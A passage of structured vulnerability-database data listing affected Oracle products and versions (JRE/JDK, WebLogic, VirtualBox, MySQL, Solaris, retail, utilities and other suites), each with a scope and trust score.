version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
